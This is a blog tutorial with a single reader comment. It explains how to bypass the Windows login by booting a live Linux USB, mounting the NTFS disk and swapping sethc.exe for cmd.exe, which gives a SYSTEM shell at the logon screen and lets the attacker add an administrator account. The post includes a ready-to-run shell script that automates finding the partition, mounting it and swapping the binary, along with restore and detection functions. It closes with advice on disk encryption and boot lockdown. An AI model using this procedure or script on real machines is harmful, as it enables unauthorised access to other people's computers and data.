
Bypassing Windows login with Linux

In this post we will see how easy it is to read files on a Windows machine, bypass the Windows login and modify the file system to create an administrator user, all without knowing a single password.

For this we will take advantage of an accessibility feature that has shipped with every Windows version since Windows 95: Sticky Keys. It was introduced to assist users with physical disabilities by serializing keystrokes instead of requiring several keys to be held at once: the user presses and releases a modifier key such as Shift, Ctrl, Alt or the Windows key, and it remains active until another key is pressed.

To invoke it, press the Shift key five times; a prompt like this one appears:

The binary behind this feature is sethc.exe, located in %WINDIR%\System32. It can be invoked from the logon screen, before anyone has signed in, and in that case it is launched by the logon process rather than by a user, so it runs as the SYSTEM account (NT AUTHORITY\SYSTEM).

If we replace that binary with a copy of cmd.exe, pressing Shift five times at the logon prompt will hand us a command line with SYSTEM privileges 🙂

All we need is a USB stick with a live Linux distribution. We boot the PC from it and, once inside Linux, mount the Windows NTFS volume to reach the file system. This assumes the machine allows booting from USB and the disk is not encrypted, which are still common defaults on personal computers; Windows file permissions are meaningless to another operating system reading the raw disk.

NTFS is a proprietary file system created by Microsoft and used by default on all modern Windows installations. Historically most Linux distributions could not write to NTFS out of the box, but a driver can be installed that lets us read and write NTFS disks: the ntfs-3g package contains a stable, read-write, open-source userspace driver for NTFS partitions (kernels from 5.15 on also ship the in-kernel ntfs3 driver).

In the following demo we will use a USB stick with Kali Linux, which includes the ntfs-3g package. I personally recommend always using Rufus to create the bootable USB.

Once inside Kali Linux we can list all partitions with fdisk -l (lsblk -f also shows the file system type of each one). The largest NTFS partition is normally the Windows system volume; the small NTFS partition next to it is the recovery partition, not the one we want. In this demo our Windows partition is /dev/sda2.

Once the Windows partition is mounted we can read, copy or modify any file in the Windows file system. To mount it we create a mount point and call mount with the ntfs-3g type:

Listing the win directory now shows the Windows file system:

NOTE: Mounting may fail with an error saying the volume is hibernated or the file system is unclean and was refused read-write access:

This happens because Windows 8 and later enable Fast Startup by default: a normal shutdown hibernates the kernel session instead of closing the volume cleanly, and ntfs-3g will not mount such a volume writable. The fix is simply to reboot Windows instead of shutting it down (a reboot always discards that state); the Restart option is available from the logon screen without signing in.

Well, the Windows file system is mounted; now we back up the original sethc.exe and copy cmd.exe over it, so that sethc.exe "is" cmd.exe:
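The Linux-side steps above (finding the Windows volume, mounting it, swapping the binary) as one added POSIX shell script; this is example code written for this edit, not the commands from the original post. It assumes the hypothetical mount point /mnt/win, reads the partition list from lsblk rather than fdisk, keeps a backup so the swap can be undone, and adds a check function a responder can run from the same live USB to detect this exact swap. The lsblk output and the stand-in "binaries" used for the dry run are constructed.

```shell
#!/bin/sh
# Added example (not the original post's commands): the Linux-side steps of the
# sticky-keys swap, written as functions so they can be dry-run on a fake tree.
# Paths are the hypothetical mount point /mnt/win and Windows/System32 below it.

# Pick the largest NTFS partition from `lsblk -rnb -o NAME,SIZE,FSTYPE` on stdin.
# Sizes are in bytes (-b), so a plain numeric compare works and the small NTFS
# recovery partition loses to the OS volume. Prints /dev/<name>, exits 1 if none.
pick_windows_partition() {
    awk '$3 == "ntfs" && $2 + 0 > max { max = $2 + 0; name = $1 }
         END { if (name == "") exit 1; print "/dev/" name }'
}

# Constructed lsblk output for the dry run: a 500 GB disk with EFI, MSR, the
# Windows volume and a recovery partition, plus the live USB itself.
SAMPLE_LSBLK='sda 500107862016
sda1 524288000 vfat
sda2 16777216
sda3 498750062592 ntfs
sda4 860160000 ntfs
sdb 31004295168
sdb1 31004295168 vfat'

# Replace sethc.exe with a copy of cmd.exe, keeping a backup. $1 is the mount
# root; the path below it is case-sensitive when mounted from Linux.
swap_sethc() {
    sys32="$1/Windows/System32"
    if [ ! -f "$sys32/sethc.exe" ] || [ ! -f "$sys32/cmd.exe" ]; then
        echo "no Windows/System32 with sethc.exe and cmd.exe under $1" >&2
        return 1
    fi
    if [ -e "$sys32/sethc.exe.bak" ]; then
        echo "sethc.exe.bak already exists: refusing to overwrite the backup" >&2
        return 1
    fi
    cp -p "$sys32/sethc.exe" "$sys32/sethc.exe.bak" &&
        cp -p "$sys32/cmd.exe" "$sys32/sethc.exe"
}

# Undo the swap from the backup.
restore_sethc() {
    sys32="$1/Windows/System32"
    [ -f "$sys32/sethc.exe.bak" ] || { echo "no sethc.exe.bak under $1" >&2; return 1; }
    mv -f "$sys32/sethc.exe.bak" "$sys32/sethc.exe"
}

# Responder-side check: the swap leaves sethc.exe byte-identical to cmd.exe.
# Returns 1 (tampered) when they match. It only catches this exact file swap.
check_sethc() {
    sys32="$1/Windows/System32"
    if cmp -s "$sys32/sethc.exe" "$sys32/cmd.exe"; then
        echo "TAMPERED: $sys32/sethc.exe is a copy of cmd.exe"
        return 1
    fi
    echo "OK: sethc.exe and cmd.exe differ"
}

# Build a throwaway tree with constructed stand-in binaries for a dry run.
make_fake_windows_tree() {
    tmp=$(mktemp -d)
    mkdir -p "$tmp/Windows/System32"
    printf 'original sethc\n' > "$tmp/Windows/System32/sethc.exe"
    printf 'original cmd\n' > "$tmp/Windows/System32/cmd.exe"
    printf '%s\n' "$tmp"
}

# Command-line entry points, run as root on the live USB. Nothing runs without args.
case "${1:-}" in
    find)    lsblk -rnb -o NAME,SIZE,FSTYPE | pick_windows_partition ;;
    mount)   mkdir -p /mnt/win && mount -t ntfs-3g "$2" /mnt/win ;;
    swap)    swap_sethc "${2:-/mnt/win}" ;;
    restore) restore_sethc "${2:-/mnt/win}" ;;
    check)   check_sethc "${2:-/mnt/win}" ;;
    dryrun)  t=$(make_fake_windows_tree); swap_sethc "$t"; check_sethc "$t"; rm -rf "$t" ;;
esac
```

Run `sh sethc_swap.sh dryrun` anywhere to see the swap and the check on a temporary tree; on the live USB the sequence is `find`, then `mount /dev/sdaN`, then `swap`, and `restore` afterwards. The check compares the two files directly because a known-good hash of sethc.exe for the exact build is rarely at hand; any EDR or file-integrity baseline that does have one will flag the swap the same way.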

Now we shut down Kali Linux, remove the USB and boot Windows again. At the logon screen, pressing Shift five times now opens a command prompt 🙂 Running whoami confirms it is running as nt authority\system:

With SYSTEM privileges we can create a new local user (Carlos, for example), add it to the Administrators group and sign in to the computer with admin rights, using the net user and net localgroup commands:

So with this post we have shown that with a Linux live USB it is possible to get into any Windows computer whose disk is not encrypted, and even create an admin user, without knowing a single password.

This is why we must always encrypt the hard drive of our personal computer (BitLocker on Windows, ideally with a TPM plus a PIN), set a firmware password and disable booting from removable media!!!

Until the next post 😉

One Comment

  1. Luci Mc Castro, 1 December, 2018

    Excellent and clarifying presentation, as always. Thanks!!!
